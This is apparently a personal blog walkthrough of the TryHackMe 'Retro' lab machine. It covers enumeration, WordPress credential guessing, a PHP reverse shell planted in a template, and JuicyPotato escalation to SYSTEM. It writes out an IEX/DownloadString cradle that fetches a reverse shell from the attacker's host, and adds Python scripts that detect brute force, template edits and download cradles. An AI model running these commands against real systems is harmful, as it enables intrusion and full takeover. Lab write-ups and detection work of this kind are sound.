TryHackMe WalkThrough — Retro

Fábio Mestre
Azkrath’s Cyber Security Blog
7 min read · Apr 5, 2021

During my journey to finish the Offensive Pentesting path on TryHackMe, I had to hack several machines. This walkthrough is for Retro, a Windows-based machine.

All flags and hashes will be redacted in order to prevent an easy win of the room. You can find the room here.

Enumeration

We get a warning right in the description of the task stating that the machine doesn’t respond to ICMP requests. Taking that into consideration, let’s start by running nmap against our target with the -Pn flag (skip host discovery, so the scan proceeds even though ping gets no reply):

Nmap scan with -Pn flag

As we can see, the machine name is RETROWEB and we have 2 ports open:

  • Port 80 — Web server running IIS
  • Port 3389 — RDP access

As usual, I tend to add an entry to /etc/hosts and use the machine’s name instead of the IP address whenever possible:

echo "10.10.13.117 retroweb" | sudo tee -a /etc/hosts

Let’s check if we can find any web page on the target:

Default IIS web page

We get the default IIS web page, so it is time to run gobuster and see what hidden directories we can find on the server:

New directory found

We can now answer the question “A web server is running on the target. What is the hidden directory which the website lives on?” with “/retro”.

Having a look at the site, we can see it is some kind of blog about retro games, books and movies:

Main site

By checking the Wappalyzer plugin, we can see that the server is running WordPress version 5.2.1:

Wappalyzer plugin analysis

A new gobuster search inside the /retro directory also finds a set of WordPress-related directories:

Finding wordpress directories

So let’s head to the wp-login.php page and see if we can find some credentials:

Default login page for WordPress

On WordPress login pages, you can try different usernames and passwords and, by default, WordPress tells you when the password is wrong for an existing username (and gives a different message for an unknown username), which allows manual user enumeration. You can also use that to brute force your way in with something like Hydra. Usually I try not to brute force login pages unless I have been really stuck on the machine for a while (as sometimes it is the intended path).

So after trying the default username and password, I decided to head to the blog looking for clues, and found something that could give us a way in:

Blog post for the movie Ready Player One

So in here, ‘Wade’ mentions that this is his favorite book of all time, especially because he shares his name with the main protagonist. In the movie/book, Wade’s avatar is ‘Parzival’, so let’s try the ‘wade’:’parzival’ combination as credentials:

And we’re in!

At this point, I remember that there is an RDP port open, so let’s try the same credentials on the machine before doing anything else in WordPress:

Wade session in Windows using the same credentials

After logging in, we can see user.txt on the Desktop and get the first flag. We can now answer the question “user.txt” with the newly found flag.

Privilege Escalation

Let’s begin by checking systeminfo and the groups and privileges of the ‘Wade’ user:

Systeminfo — Windows Server 2016
Information regarding user, groups and privileges

Usually, if the machine is Windows 10 version 1809 or higher, or Windows Server 2019, we can use something like the RoguePotato attack to escalate privileges. Otherwise, we can try a JuicyPotato attack. I am not going to go into detail about this type of attack, but for it to be possible we need a low-privilege account that holds one of the following privileges:

  • ‘SeImpersonatePrivilege’
  • ‘SeAssignPrimaryTokenPrivilege’

So we conclude that the machine is running Windows Server 2016 and that the user doesn’t have the privileges needed to escalate our access to SYSTEM with something like a Potato privilege escalation attack.

After a while of enumerating services and programs, I remember that we still have the WordPress access, and maybe the account running the web server is a different one with different privileges.

We start by logging into WordPress and placing a reverse shell in one of the page templates (you can set up a reverse shell for Windows/PHP like this):

Reverse shell in the Main Index Template

Don’t forget to change the IP address and port to the ones you are going to use (the IP address should be the one assigned to you when connecting to the TryHackMe VPN). After editing the file, we need to open a netcat listener on our machine before refreshing the edited page:
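Both of the points above, the login page’s username-revealing error message and the template edit through the WordPress admin, leave traces in the IIS W3C access log on the server side. The following Python script is an added example (not part of the original post or of any tool it mentions) that parses a small constructed log excerpt using the `#Fields:` header and flags two things: a client sending repeated failed wp-login.php POSTs within a short window, and any POST to the theme editor. It also watches the plugin editor, which is a generalisation of the template edit shown on this page. The log lines, client addresses and theme name are constructed.

```python
"""Detect WordPress login abuse and theme/plugin editor writes in IIS W3C logs."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed IIS W3C extended log excerpt (not taken from the room). The site
# lives under /retro as in the walkthrough; client addresses are made up.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-04-05 10:00:01 10.10.13.117 GET /retro/ - 80 - 10.9.1.5 Mozilla/5.0 200
2021-04-05 10:00:05 10.10.13.117 POST /retro/wp-login.php - 80 - 10.9.1.5 Mozilla/5.0 200
2021-04-05 10:00:06 10.10.13.117 POST /retro/wp-login.php - 80 - 10.9.1.5 Mozilla/5.0 200
2021-04-05 10:00:07 10.10.13.117 POST /retro/wp-login.php - 80 - 10.9.1.5 Mozilla/5.0 200
2021-04-05 10:00:08 10.10.13.117 POST /retro/wp-login.php - 80 - 10.9.1.5 Mozilla/5.0 200
2021-04-05 10:00:09 10.10.13.117 POST /retro/wp-login.php - 80 - 10.9.1.5 Mozilla/5.0 302
2021-04-05 10:01:30 10.10.13.117 GET /retro/wp-admin/theme-editor.php file=index.php&theme=sometheme 80 - 10.9.1.5 Mozilla/5.0 200
2021-04-05 10:01:45 10.10.13.117 POST /retro/wp-admin/theme-editor.php - 80 - 10.9.1.5 Mozilla/5.0 200
2021-04-05 10:02:00 10.10.13.117 GET /retro/ - 80 - 10.9.1.5 Mozilla/5.0 200
2021-04-05 10:05:00 10.10.13.117 POST /retro/wp-login.php - 80 - 10.9.2.8 Mozilla/5.0 302
"""

LOGIN_PATH = "/wp-login.php"
# theme-editor.php is the page's template edit; plugin-editor.php is the same
# capability for plugin files (generalisation, not something the page shows).
EDITOR_PATHS = ("/wp-admin/theme-editor.php", "/wp-admin/plugin-editor.php")


def parse_iis_log(text):
    """Map each data line onto the column names given by the #Fields: header."""
    fields = None
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        values = line.split()  # IIS replaces spaces inside a field with '+'
        if fields is None or len(values) != len(fields):
            continue  # skip lines that do not match the current header
        records.append(dict(zip(fields, values)))
    return records


def detect_login_bruteforce(records, threshold=4, window=timedelta(minutes=5)):
    """Return {client_ip: max_failures_in_window} for clients reaching the
    threshold. WordPress re-renders the login form with HTTP 200 on a bad
    username or password and answers a successful login with a 302 redirect,
    so a 200 on a POST to wp-login.php is counted as a failed attempt."""
    attempts = defaultdict(list)
    for r in records:
        if (r["cs-method"] == "POST" and r["cs-uri-stem"].endswith(LOGIN_PATH)
                and r["sc-status"] == "200"):
            ts = datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S")
            attempts[r["c-ip"]].append(ts)
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def detect_template_edits(records):
    """Return (client_ip, uri_stem, time) for POSTs to the theme or plugin
    editor: a successful save there writes PHP straight into the web root."""
    return [(r["c-ip"], r["cs-uri-stem"], r["time"]) for r in records
            if r["cs-method"] == "POST" and r["cs-uri-stem"].endswith(EDITOR_PATHS)]


def triage(text):
    records = parse_iis_log(text)
    return {"bruteforce": detect_login_bruteforce(records),
            "template_edits": detect_template_edits(records)}


if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

The editor check is the higher-value one: a single POST to theme-editor.php from an address that just finished a run of failed logins is a far stronger signal than either event alone. On the WordPress side, setting `DISALLOW_FILE_EDIT` to true in wp-config.php removes the in-browser theme and plugin editors altogether, which closes the path this walkthrough uses to get code execution as the web server account.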

Netcat listener

After refreshing the page, we should have our reverse shell popping up in our machine:

Reverse shell

Let’s start by checking which user this is and what privileges it has:

New user information, groups and privileges

As we can see, the user retro has the ‘SeImpersonatePrivilege’ enabled, which is what we need to escalate our access to SYSTEM, so let’s try a JuicyPotato attack on this one.
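The privilege check above doubles as an audit for a defender: any account that holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege and can be made to run attacker-supplied code (here, the web server account behind a WordPress site with an editable template) is exposed to this class of attack, which covers both the wade result earlier and the retro result here. The following Python script is an added example, not from the original post, that parses `whoami /priv` output and reports whether those privileges are present. The two sample outputs are constructed: the impersonation privileges mirror what the walkthrough found for the wade and retro users, the remaining lines are made up.

```python
"""Audit `whoami /priv` output for the token privileges that enable Potato-style
token impersonation (SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege)."""
import re

POTATO_PRIVILEGES = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Constructed samples in the layout `whoami /priv` prints. Only the presence or
# absence of the two impersonation privileges follows the walkthrough.
WADE_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

RETRO_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One privilege row: name, free-text description, then Enabled/Disabled.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: 'Enabled'|'Disabled'} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def potato_exposure(privs):
    """Return the impersonation privileges the token holds. A held privilege
    counts even when shown as Disabled: a process can re-enable privileges
    that are already in its token, so only absence removes the exposure."""
    return [p for p in POTATO_PRIVILEGES if p in privs]


def assess(text):
    privs = parse_whoami_priv(text)
    held = potato_exposure(privs)
    return {"privileges": privs,
            "potato_privileges": held,
            "verdict": "exposed" if held else "not exposed"}


if __name__ == "__main__":
    for name, sample in (("wade", WADE_PRIV), ("retro", RETRO_PRIV)):
        print(name, assess(sample)["verdict"], assess(sample)["potato_privileges"])
```

Run against saved `whoami /priv` output from service accounts, this gives a quick list of the accounts whose compromise would mean SYSTEM on a host like this one; IIS application pool identities hold SeImpersonatePrivilege by design, so for them the practical control is to keep attacker-controlled code away from the account rather than to strip the privilege.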

I tend to make a directory to perform my attacks from, especially because it is easier to clean up afterwards if needed. So let’s make a temp directory under C:\:

cd C:\
mkdir temp
cd temp

So first we need to download our exploit. We can get the latest version here. After downloading it to our machine, we need to transfer it to the server. Let’s start a Python HTTP server and download it from the other side using PowerShell.

On our machine we run this Python module on the directory where we have our exploit:

sudo python3 -m http.server 80

And we should be able to access our web server using our IP address:

Our web server serving our exploit

Now we head to our server, start PowerShell and get the exploit into our newly created directory using the following command:

Invoke-WebRequest <resource_to_download> -OutFile <output_file_name>

We can download the exploit using Invoke-WebRequest

After downloading the exploit, let’s see if we can run it in the machine:

Execution of JuicyPotato

Perfect! This will allow us to run executables as a SYSTEM-level process, so we also need something to execute with the JuicyPotato executable. In this case, we can just use another reverse shell that will pop a SYSTEM shell on our side.

We can create one with msfvenom or download one specific for this case, like the Nishang reverse shell from here.

So let’s download Invoke-PowerShellTcp.ps1 from the Shells directory and save it on our machine. Additionally, let’s add a new line at the end of the file containing the following command, replacing the IP and port with our own:

Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>

Now let’s get our reverse shell onto the server using the same procedure:

Reverse shell to use as payload with JuicyPotato

Now we just need an executable that runs our reverse shell so that we get a shell with SYSTEM privileges on our side. Let’s create a .bat file and download it to the server using the same method. The .bat file should contain the following line, with the IP replaced by our own IP address:

PowerShell "IEX(New-Object Net.WebClient).downloadString('http://<IP>/rshell.ps1')"

Now we need to download it to the server, again using Invoke-WebRequest:

Bat file to be executed with the JuicyPotato

And now we just need to open a netcat listener on our side, on a different port than the one we are currently using for this shell:

Netcat listener on port 4445 for the SYSTEM shell

The flow of this attack is something like this:

  • The JuicyPotato exploit runs the .bat file as SYSTEM
  • The .bat file with SYSTEM privileges downloads our Nishang reverse shell and executes it
  • We get a SYSTEM shell on our side by using a netcat listener
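From the defender’s side, every step of that chain shows up in process-creation telemetry: the CommandLine, Image and ParentImage fields of Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing enabled. The following Python script is an added example, not part of the original post, that scans a few constructed events for the patterns this walkthrough relies on: an IEX plus DownloadString cradle, Invoke-WebRequest writing a file to disk, staging under C:\temp, and PowerShell spawned by cmd.exe running a .bat file. The event layout, process ids and the 10.9.1.5 address are constructed.

```python
"""Flag download-cradle and payload-staging patterns in process-creation events."""
import re

# Command-line rules: (name, predicate over the CommandLine string).
CMDLINE_RULES = [
    # Invoke-Expression fed by an in-memory download: the script never touches disk
    ("iex_download_cradle", lambda c: bool(
        re.search(r"\b(IEX|Invoke-Expression)\b", c, re.I)
        and re.search(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", c, re.I))),
    # Invoke-WebRequest saving a fetched file to disk
    ("webrequest_to_disk", lambda c: bool(
        re.search(r"\b(Invoke-WebRequest|iwr)\b[^|;]*-OutFile", c, re.I))),
    # Fetched file written to a user-writable staging directory
    ("staging_in_temp", lambda c: bool(
        re.search(r'-OutFile\s+"?[A-Za-z]:\\(temp|Windows\\Temp|Users\\[^\\]+\\AppData\\Local\\Temp)\\',
                  c, re.I))),
]


def bat_spawned_powershell(event):
    """PowerShell started by cmd.exe that is running a .bat file, which is how
    the launcher in this walkthrough appears (the .bat path sits in the
    parent's command line, not in the child's)."""
    return (event.get("Image", "").lower().endswith("\\powershell.exe")
            and event.get("ParentImage", "").lower().endswith("\\cmd.exe")
            and ".bat" in event.get("ParentCommandLine", "").lower())


def scan_event(event):
    """Return the names of all rules the event matches, command-line rules first."""
    matches = [name for name, rule in CMDLINE_RULES if rule(event.get("CommandLine", ""))]
    if bat_spawned_powershell(event):
        matches.append("bat_spawned_powershell")
    return matches


def scan_events(events):
    """Return {ProcessId: [rule names]} for every event that matched at least one rule."""
    result = {}
    for ev in events:
        hits = scan_event(ev)
        if hits:
            result[ev["ProcessId"]] = hits
    return result


# Constructed sample events. Field names follow Sysmon Event ID 1; the values are
# made up, with 10.9.1.5 standing in for the attacker host used in the walkthrough.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 1001, "Image": PS,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r'C:\Windows\System32\cmd.exe /c ""C:\temp\shell.bat" "',
     "CommandLine": "PowerShell \"IEX(New-Object Net.WebClient).downloadString('http://10.9.1.5/rshell.ps1')\""},
    {"ProcessId": 1002, "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -NoProfile -Command "Invoke-WebRequest http://10.9.1.5/j.exe -OutFile C:\temp\j.exe"'},
    {"ProcessId": 1003, "Image": PS,  # benign: no download, no .bat parent
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -Command Get-Process"},
]


if __name__ == "__main__":
    for pid, hits in scan_events(SAMPLE_EVENTS).items():
        print(pid, hits)
```

The parent/child rule is the one that survives trivial renaming of the payload: whatever the .bat and the script are called, a SYSTEM-level process tree of cmd.exe running a batch file that immediately starts PowerShell with a plain-HTTP URL on its command line is rare on a web server and worth an alert on its own.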

So let’s try our attack and see if we get a SYSTEM shell on our side. We can run JuicyPotato like this:

.\j.exe -t * -p <path_to_executable.bat> -l 9002

Running our attack

SYSTEM shell on our side

Now we can just head to the Administrator Desktop and grab our root flag!

The root flag!

We can now answer the question “root.txt” with the newly found root flag.

Overall, this machine was fun to solve. It is classified as a hard machine, but I think it is more of a medium difficulty.

I hope you enjoyed reading this post as much as I enjoyed writing it. Let me know in the comments if something is wrong or missing, as I am still learning myself and feedback is always welcomed :)


Pentester, CyberSecurity Enthusiast, Software Engineer, enjoys everything related to hacking, programming and cybersecurity.